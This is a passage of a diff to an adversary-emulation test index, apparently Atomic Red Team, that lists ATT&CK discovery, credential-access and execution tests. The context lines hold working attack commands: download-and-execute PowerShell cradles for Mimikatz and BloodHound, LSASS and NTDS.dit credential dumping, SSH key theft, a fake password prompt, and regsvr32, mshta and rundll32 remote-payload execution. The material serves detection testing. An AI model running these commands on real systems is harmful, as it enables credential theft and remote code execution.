description: 'Lists the password policy to console on macOS.
'
'
supported_platforms:
- macos
executor:
@@ -18301,7 +18301,7 @@ discovery:
- name: Permission Groups Discovery
description: 'Permission Groups Discovery
'
'
supported_platforms:
- macos
- linux
@@ -18314,7 +18314,7 @@ discovery:
- name: Basic Permission Groups Discovery Windows
description: 'Basic Permission Groups Discovery for Windows
'
'
supported_platforms:
- windows
executor:
@@ -18327,7 +18327,7 @@ discovery:
- name: Permission Groups Discovery PowerShell
description: 'Permission Groups Discovery utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -18345,7 +18345,7 @@ discovery:
description: 'Runs "net group" command including command aliases and loose typing
to simulate enumeration/discovery of high value domain groups
'
'
supported_platforms:
- windows
executor:
@@ -18409,7 +18409,7 @@ discovery:
- name: Process Discovery - ps
description: 'Utilize ps to identify processes
'
'
supported_platforms:
- macos
- linux
@@ -18427,7 +18427,7 @@ discovery:
- name: Process Discovery - tasklist
description: 'Utilize tasklist to identify processes
'
'
supported_platforms:
- windows
executor:
@@ -18435,7 +18435,7 @@ discovery:
elevation_required: false
command: 'tasklist
'
'
T1012:
technique:
x_mitre_data_sources:
@@ -18598,7 +18598,7 @@ discovery:
- name: Remote System Discovery - net
description: 'Identify remote systems with net.exe
'
'
supported_platforms:
- windows
executor:
@@ -18611,7 +18611,7 @@ discovery:
description: 'Identify remote systems with net.exe querying the Active Directory
Domain Computers group.
'
'
supported_platforms:
- windows
executor:
@@ -18619,11 +18619,11 @@ discovery:
elevation_required: false
command: 'net group "Domain Computers" /domain
'
'
- name: Remote System Discovery - nltest
description: 'Identify domain controllers for specified domain.
'
'
supported_platforms:
- windows
input_arguments:
@@ -18636,11 +18636,11 @@ discovery:
elevation_required: false
command: 'nltest.exe /dclist:#{target_domain}
'
'
- name: Remote System Discovery - ping sweep
description: 'Identify remote systems via ping sweep
'
'
supported_platforms:
- windows
executor:
@@ -18648,11 +18648,11 @@ discovery:
elevation_required: false
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
'
'
- name: Remote System Discovery - arp
description: 'Identify remote systems via arp
'
'
supported_platforms:
- windows
executor:
@@ -18660,11 +18660,11 @@ discovery:
elevation_required: false
command: 'arp -a
'
'
- name: Remote System Discovery - arp nix
description: 'Identify remote systems via arp
'
'
supported_platforms:
- linux
- macos
@@ -18673,11 +18673,11 @@ discovery:
elevation_required: false
command: 'arp -a | grep -v ''^?''
'
'
- name: Remote System Discovery - sweep
description: 'Identify remote systems via ping sweep
'
'
supported_platforms:
- linux
- macos
@@ -18687,12 +18687,12 @@ discovery:
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ]
&& echo "192.168.1.$ip UP" || : ; done
'
'
- name: Remote System Discovery - nslookup
description: 'Powershell script that runs nslookup on cmd.exe against the local
/24 network of the first network adaptor listed in ipconfig
'
'
supported_platforms:
- windows
executor:
@@ -18754,7 +18754,7 @@ discovery:
- name: Security Software Discovery
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- windows
executor:
@@ -18770,7 +18770,7 @@ discovery:
- name: Security Software Discovery - powershell
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- windows
executor:
@@ -18784,7 +18784,7 @@ discovery:
- name: Security Software Discovery - ps
description: 'Methods to identify Security Software on an endpoint
'
'
supported_platforms:
- linux
- macos
@@ -18798,7 +18798,7 @@ discovery:
description: 'Discovery of an installed Sysinternals Sysmon service using driver
altitude (even if the name is changed).
'
'
supported_platforms:
- windows
executor:
@@ -18806,11 +18806,11 @@ discovery:
elevation_required: true
command: 'fltmc.exe | findstr.exe 385201
'
'
- name: Security Software Discovery - AV Discovery via WMI
description: 'Discovery of installed antivirus products via a WMI query.
'
'
supported_platforms:
- windows
executor:
@@ -18863,7 +18863,7 @@ discovery:
software that is installed on the system. Adversaries may use the information
from Software Discovery during automated discovery to shape follow-on behaviors
'
'
supported_platforms:
- windows
executor:
@@ -18872,13 +18872,13 @@ discovery:
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
/v svcVersion
'
'
- name: Applications Installed
description: 'Adversaries may attempt to get a listing of all software that
is installed on the system. Adversaries may use the information from Software
Discovery during automated discovery to shape follow-on behaviors
'
'
supported_platforms:
- windows
executor:
@@ -18970,7 +18970,7 @@ discovery:
- name: System Information Discovery
description: 'Identify System Info
'
'
supported_platforms:
- windows
executor:
@@ -18982,7 +18982,7 @@ discovery:
- name: System Information Discovery
description: 'Identify System Info
'
'
supported_platforms:
- linux
- macos
@@ -18995,7 +18995,7 @@ discovery:
- name: List OS Information
description: 'Identify System Info
'
'
supported_platforms:
- linux
- macos
@@ -19011,7 +19011,7 @@ discovery:
description: 'Identify virtual machine hardware. This technique is used by the
Pupy RAT and other malware.
'
'
supported_platforms:
- linux
executor:
@@ -19029,7 +19029,7 @@ discovery:
description: 'Identify virtual machine guest kernel modules. This technique
is used by the Pupy RAT and other malware.
'
'
supported_platforms:
- linux
executor:
@@ -19043,7 +19043,7 @@ discovery:
- name: Hostname Discovery (Windows)
description: 'Identify system hostname for Windows.
'
'
supported_platforms:
- windows
executor:
@@ -19051,11 +19051,11 @@ discovery:
elevation_required: false
command: 'hostname
'
'
- name: Hostname Discovery
description: 'Identify system hostname for Linux and macOS systems.
'
'
supported_platforms:
- linux
- macos
@@ -19064,11 +19064,11 @@ discovery:
elevation_required: false
command: 'hostname
'
'
- name: Windows MachineGUID Discovery
description: 'Identify the Windows MachineGUID value for a system.
'
'
supported_platforms:
- windows
executor:
@@ -19077,7 +19077,7 @@ discovery:
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
MachineGuid
'
'
T1016:
technique:
x_mitre_data_sources:
@@ -19121,7 +19121,7 @@ discovery:
- name: System Network Configuration Discovery
description: 'Identify network configuration information
'
'
supported_platforms:
- windows
executor:
@@ -19136,7 +19136,7 @@ discovery:
- name: List Windows Firewall Rules
description: 'Enumerates Windows Firewall Rules using netsh.
'
'
supported_platforms:
- windows
executor:
@@ -19144,11 +19144,11 @@ discovery:
elevation_required: false
command: 'netsh advfirewall firewall show rule name=all
'
'
- name: System Network Configuration Discovery
description: 'Identify network configuration information
'
'
supported_platforms:
- macos
- linux
@@ -19163,7 +19163,7 @@ discovery:
description: 'Identify network configuration information as seen by Trickbot
and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
'
'
supported_platforms:
- windows
executor:
@@ -19287,7 +19287,7 @@ discovery:
- name: System Network Connections Discovery
description: 'Get a listing of network connections.
'
'
supported_platforms:
- windows
executor:
@@ -19300,7 +19300,7 @@ discovery:
- name: System Network Connections Discovery with PowerShell
description: 'Get a listing of network connections.
'
'
supported_platforms:
- windows
executor:
@@ -19308,11 +19308,11 @@ discovery:
elevation_required: false
command: 'Get-NetTCPConnection
'
'
- name: System Network Connections Discovery Linux & MacOS
description: 'Get a listing of network connections.
'
'
supported_platforms:
- linux
- macos
@@ -19375,7 +19375,7 @@ discovery:
- name: System Owner/User Discovery
description: 'Identify System owner or users on an endpoint
'
'
supported_platforms:
- windows
input_arguments:
@@ -19398,7 +19398,7 @@ discovery:
- name: System Owner/User Discovery
description: 'Identify System owner or users on an endpoint
'
'
supported_platforms:
- linux
- macos
@@ -19456,7 +19456,7 @@ discovery:
- name: System Service Discovery
description: 'Identify system services
'
'
supported_platforms:
- windows
executor:
@@ -19470,7 +19470,7 @@ discovery:
description: 'Enumerates started system services using net.exe and writes them
to a file. This technique has been used by multiple threat actors.
'
'
supported_platforms:
- windows
input_arguments:
@@ -19483,10 +19483,10 @@ discovery:
elevation_required: false
command: 'net.exe start >> #{output_file}
'
'
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
'
'
T1124:
technique:
x_mitre_data_sources:
@@ -19541,7 +19541,7 @@ discovery:
- name: System Time Discovery
description: 'Identify the system time
'
'
supported_platforms:
- windows
input_arguments:
@@ -19558,7 +19558,7 @@ discovery:
- name: System Time Discovery - PowerShell
description: 'Identify the system time via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -19566,7 +19566,7 @@ discovery:
elevation_required: false
command: 'Get-Date
'
'
credential-access:
T1098:
technique:
@@ -19664,7 +19664,7 @@ credential-access:
- name: Admin Account Manipulate
description: 'Manipulate Admin Account Name
'
'
supported_platforms:
- windows
executor:
@@ -19736,7 +19736,7 @@ credential-access:
description: 'Search through bash history for specifice commands we want to
capture
'
'
supported_platforms:
- linux
- macos
@@ -19759,7 +19759,7 @@ credential-access:
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
'
'
T1110:
technique:
x_mitre_permissions_required:
@@ -19862,7 +19862,7 @@ credential-access:
description: 'Creates username and password files then attempts to brute force
on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -20223,7 +20223,7 @@ credential-access:
description: 'Dumps credentials from memory via Powershell by invoking a remote
mimikatz script
'
'
supported_platforms:
- windows
input_arguments:
@@ -20237,11 +20237,11 @@ credential-access:
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
'
'
- name: Gsecdump
description: 'Dump credentials from memory using Gsecdump
'
'
supported_platforms:
- windows
input_arguments:
@@ -20275,7 +20275,7 @@ credential-access:
description: 'Dump credentials from memory using Windows Credential Editor from
https://www.ampliasecurity.com/research/windows-credentials-editor/
'
'
supported_platforms:
- windows
input_arguments:
@@ -20360,7 +20360,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
'
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
@@ -20414,7 +20414,7 @@ credential-access:
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
'
'
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -20438,12 +20438,12 @@ credential-access:
elevation_required: true
command: 'ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
'
'
- name: Create Volume Shadow Copy with NTDS.dit
description: 'The Active Directory database NTDS.dit may be dumped by copying
it from a Volume Shadow Copy.
'
'
supported_platforms:
- windows
input_arguments:
@@ -20462,7 +20462,7 @@ credential-access:
elevation_required: true
command: 'vssadmin.exe create shadow /for=#{drive_letter}
'
'
- name: Copy NTDS.dit from Volume Shadow Copy
description: "The Active Directory database NTDS.dit may be dumped by copying
it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test
@@ -20509,7 +20509,7 @@ credential-access:
files on the Domain Controller. This value can be decrypted with gpp-decrypt
on Kali Linux.
'
'
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -20524,12 +20524,12 @@ credential-access:
elevation_required: false
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
'
'
- name: GPP Passwords (Get-GPPPassword)
description: 'Look for the encrypted cpassword value within Group Policy Preference
files on the Domain Controller.
'
'
supported_platforms:
- windows
input_arguments:
@@ -20581,11 +20581,11 @@ credential-access:
elevation_required: true
command: 'pypykatz live lsa
'
'
- name: Registry parse with pypykatz
description: 'Parses registry hives to obtain stored credentials
'
'
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -20604,7 +20604,7 @@ credential-access:
elevation_required: true
command: 'pypykatz live registry
'
'
T1081:
technique:
x_mitre_permissions_required:
@@ -20680,11 +20680,11 @@ credential-access:
name: sh
command: 'python2 laZagne.py all
'
'
- name: Extract passwords with grep
description: 'Extracting credentials from files
'
'
input_arguments:
file_path:
description: Path to search
@@ -20697,11 +20697,11 @@ credential-access:
name: sh
command: 'grep -ri password #{file_path}
'
'
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
'
'
supported_platforms:
- windows
executor:
@@ -20714,7 +20714,7 @@ credential-access:
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
'
'
supported_platforms:
- windows
executor:
@@ -20777,7 +20777,7 @@ credential-access:
- name: Enumeration for Credentials in Registry
description: 'Queries to enumerate for credentials in the Registry.
'
'
supported_platforms:
- windows
executor:
@@ -20789,7 +20789,7 @@ credential-access:
- name: Enumeration for PuTTY Credentials in Registry
description: 'Queries to enumerate for PuTTY credentials in the Registry.
'
'
supported_platforms:
- windows
executor:
@@ -20797,7 +20797,7 @@ credential-access:
elevation_required: false
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
'
'
T1179:
technique:
x_mitre_data_sources:
@@ -20927,7 +20927,7 @@ credential-access:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -21035,7 +21035,7 @@ credential-access:
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
'
'
T1141:
technique:
x_mitre_data_sources:
@@ -21109,7 +21109,7 @@ credential-access:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
'
'
- name: PowerShell - Prompt User for Password
description: |
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
@@ -21334,7 +21334,7 @@ credential-access:
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
'
supported_platforms:
- linux
input_arguments:
@@ -21352,7 +21352,7 @@ credential-access:
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
'
supported_platforms:
- macos
input_arguments:
@@ -21455,7 +21455,7 @@ credential-access:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21549,11 +21549,11 @@ credential-access:
dir c:\ /b /s .key | findstr /e .key
cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
'
'
- name: Discover Private SSH Keys
description: 'Discover private SSH keys on a macOS or Linux system.
'
'
supported_platforms:
- macos
- linux
@@ -21571,7 +21571,7 @@ credential-access:
description: 'Copy private SSH keys on a Linux system to a staging folder using
the `cp` command.
'
'
supported_platforms:
- linux
input_arguments:
@@ -21589,7 +21589,7 @@ credential-access:
description: 'Copy private SSH keys on a Linux or macOS system to a staging
folder using the `rsync` command.
'
'
supported_platforms:
- macos
- linux
@@ -21673,7 +21673,7 @@ execution:
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\"
| python &""
'
'
T1191:
technique:
x_mitre_data_sources:
@@ -21753,7 +21753,7 @@ execution:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
'
supported_platforms:
- windows
input_arguments:
@@ -21773,12 +21773,12 @@ execution:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_path}
'
'
- name: CMSTP Executing UAC Bypass
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
'
supported_platforms:
- windows
input_arguments:
@@ -21798,7 +21798,7 @@ execution:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_uac} /au
'
'
T1059:
technique:
x_mitre_data_sources:
@@ -21923,7 +21923,7 @@ execution:
- name: Compiled HTML Help Local Payload
description: 'Uses hh.exe to execute a local compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21943,11 +21943,11 @@ execution:
elevation_required: false
command: 'hh.exe #{local_chm_file}
'
'
- name: Compiled HTML Help Remote Payload
description: 'Uses hh.exe to execute a remote compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -21960,7 +21960,7 @@ execution:
elevation_required: false
command: 'hh.exe #{remote_chm_file}
'
'
'':
technique:
x_mitre_permissions_required:
@@ -22099,7 +22099,7 @@ execution:
description: 'This test simulates an adversary leveraging control.exe to execute
a payload and pops calc
'
'
supported_platforms:
- windows
input_arguments:
@@ -22119,7 +22119,7 @@ execution:
elevation_required: false
command: 'control.exe #{cpl_file_path}
'
'
T1173:
technique:
x_mitre_data_sources:
@@ -22199,7 +22199,7 @@ execution:
- name: Execute Commands
description: 'Executes commands via DDE using Microsfot Word
'
'
supported_platforms:
- windows
executor:
@@ -22221,7 +22221,7 @@ execution:
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
and execute a powershell script
'
'
supported_platforms:
- windows
executor:
@@ -22229,7 +22229,7 @@ execution:
elevation_required: false
command: 'start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
'
'
T1118:
technique:
x_mitre_data_sources:
@@ -22287,7 +22287,7 @@ execution:
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22353,7 +22353,7 @@ execution:
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22420,7 +22420,7 @@ execution:
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22487,7 +22487,7 @@ execution:
- name: InstallUtil Install method call
description: 'Executes the Install Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22554,7 +22554,7 @@ execution:
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22622,7 +22622,7 @@ execution:
variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22689,7 +22689,7 @@ execution:
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -22757,7 +22757,7 @@ execution:
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -22874,14 +22874,14 @@ execution:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1168:
technique:
x_mitre_data_sources:
@@ -22969,7 +22969,7 @@ execution:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
'
supported_platforms:
- macos
- linux
@@ -22986,13 +22986,13 @@ execution:
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
'
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
'
supported_platforms:
- macos
- linux
@@ -23009,7 +23009,7 @@ execution:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
@@ -23147,7 +23147,7 @@ execution:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -23174,7 +23174,7 @@ execution:
name: command_prompt
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""{local_file_path}"")(window.close)")
'
'
- name: Mshta executes VBScript to execute malicious command
description: |
Run a local VB script to run local user enumeration powershell command
@@ -23187,11 +23187,11 @@ execution:
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
'
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
'
supported_platforms:
- windows
input_arguments:
@@ -23211,7 +23211,7 @@ execution:
mshta "#{temp_file}"
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
'
'
T1086:
technique:
x_mitre_permissions_required:
@@ -23305,7 +23305,7 @@ execution:
- name: Mimikatz
description: 'Download Mimikatz and dump credentials
'
'
supported_platforms:
- windows
input_arguments:
@@ -23319,11 +23319,11 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
'
'
- name: BloodHound
description: 'Download Bloodhound and run it
'
'
supported_platforms:
- windows
input_arguments:
@@ -23337,7 +23337,7 @@ execution:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Invoke-BloodHound"
'
'
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
@@ -23354,7 +23354,7 @@ execution:
- name: Mimikatz - Cradlecraft PsSendKeys
description: 'Run mimikatz via PsSendKeys
'
'
supported_platforms:
- windows
executor:
@@ -23385,11 +23385,11 @@ execution:
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
'
'
- name: PowerShell Add User
description: 'Using PS 5.1, add a user via CLI
'
'
supported_platforms:
- windows
input_arguments:
@@ -23415,7 +23415,7 @@ execution:
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
-Password #{password} -Description ''#{description}''
'
'
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23435,7 +23435,7 @@ execution:
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
'
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23455,7 +23455,7 @@ execution:
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
'
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23474,7 +23474,7 @@ execution:
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
'
'
- name: Powershell invoke mshta.exe download
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23491,7 +23491,7 @@ execution:
elevation_required: false
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
'
'
- name: Powershell Invoke-DownloadCradle
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -23507,7 +23507,7 @@ execution:
description: 'Execution of a PowerShell payload from the Windows Registry similar
to that seen in fileless malware infections.
'
'
supported_platforms:
- windows
executor:
@@ -23523,7 +23523,7 @@ execution:
- name: PowerShell Downgrade Attack
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
'
'
supported_platforms:
- windows
dependencies:
@@ -23537,12 +23537,12 @@ execution:
elevation_required: false
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
'
'
- name: NTFS Alternate Data Stream Access
description: 'Creates a file with an alternate data stream and simulates executing
that hidden code/file
'
'
supported_platforms:
- windows
input_arguments:
@@ -23564,7 +23564,7 @@ execution:
Invoke-Expression $streamcommand
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
'
'
T1121:
technique:
x_mitre_data_sources:
@@ -23628,7 +23628,7 @@ execution:
- name: Regasm Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required
'
'
supported_platforms:
- windows
input_arguments:
@@ -23656,12 +23656,12 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
- name: Regsvs Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
'
supported_platforms:
- windows
input_arguments:
@@ -23769,7 +23769,7 @@ execution:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23789,12 +23789,12 @@ execution:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
'
'
- name: Regsvr32 remote COM scriptlet execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23807,12 +23807,12 @@ execution:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
'
- name: Regsvr32 local DLL execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -23834,7 +23834,7 @@ execution:
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
'
T1085:
technique:
x_mitre_data_sources:
@@ -23897,7 +23897,7 @@ execution:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -23910,7 +23910,7 @@ execution:
elevation_required: false
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
'
'
- name: Rundll32 execute VBscript command
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
@@ -23928,7 +23928,7 @@ execution:
elevation_required: false
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
'
- name: Rundll32 advpack.dll Execution
description: |
Test execution of a command using rundll32.exe with advpack.dll.
@@ -23953,7 +23953,7 @@ execution:
elevation_required: false
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 ieadvpack.dll Execution
description: |
Test execution of a command using rundll32.exe with ieadvpack.dll.
@@ -23978,7 +23978,7 @@ execution:
elevation_required: false
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 syssetup.dll Execution
description: |
Test execution of a command using rundll32.exe with syssetup.dll.
@@ -24004,7 +24004,7 @@ execution:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
'
'
- name: Rundll32 setupapi.dll Execution
description: |
Test execution of a command using rundll32.exe with setupapi.dll.
@@ -24030,7 +24030,7 @@ execution:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
'
'
T1053:
technique:
x_mitre_permissions_required:
@@ -24133,7 +24133,7 @@ execution:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -24152,14 +24152,14 @@ execution:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -24189,10 +24189,10 @@ execution:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -24212,7 +24212,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1064:
technique:
x_mitre_permissions_required:
@@ -24281,7 +24281,7 @@ execution:
- name: Create and Execute Bash Shell Script
description: 'Creates and executes a simple bash script.
'
'
supported_platforms:
- macos
- linux
@@ -24296,7 +24296,7 @@ execution:
- name: Create and Execute Batch Script
description: 'Creates and executes a simple batch script.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24316,7 +24316,7 @@ execution:
\n"
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
'
T1035:
technique:
x_mitre_data_sources:
@@ -24364,7 +24364,7 @@ execution:
it. When executing commands such as PowerShell, the service will report that
it did not start correctly even when code executes properly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24413,7 +24413,7 @@ execution:
elevation_required: false
command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
'
'
T1218:
technique:
x_mitre_data_sources:
@@ -24527,7 +24527,7 @@ execution:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24551,12 +24551,12 @@ execution:
elevation_required: true
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
'
'
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24568,12 +24568,12 @@ execution:
name: command_prompt
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
'
'
- name: Register-CimProvider - Execute evil dll
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
'
'
supported_platforms:
- windows
input_arguments:
@@ -24592,11 +24592,11 @@ execution:
name: command_prompt
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
'
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
'
'
supported_platforms:
- windows
input_arguments:
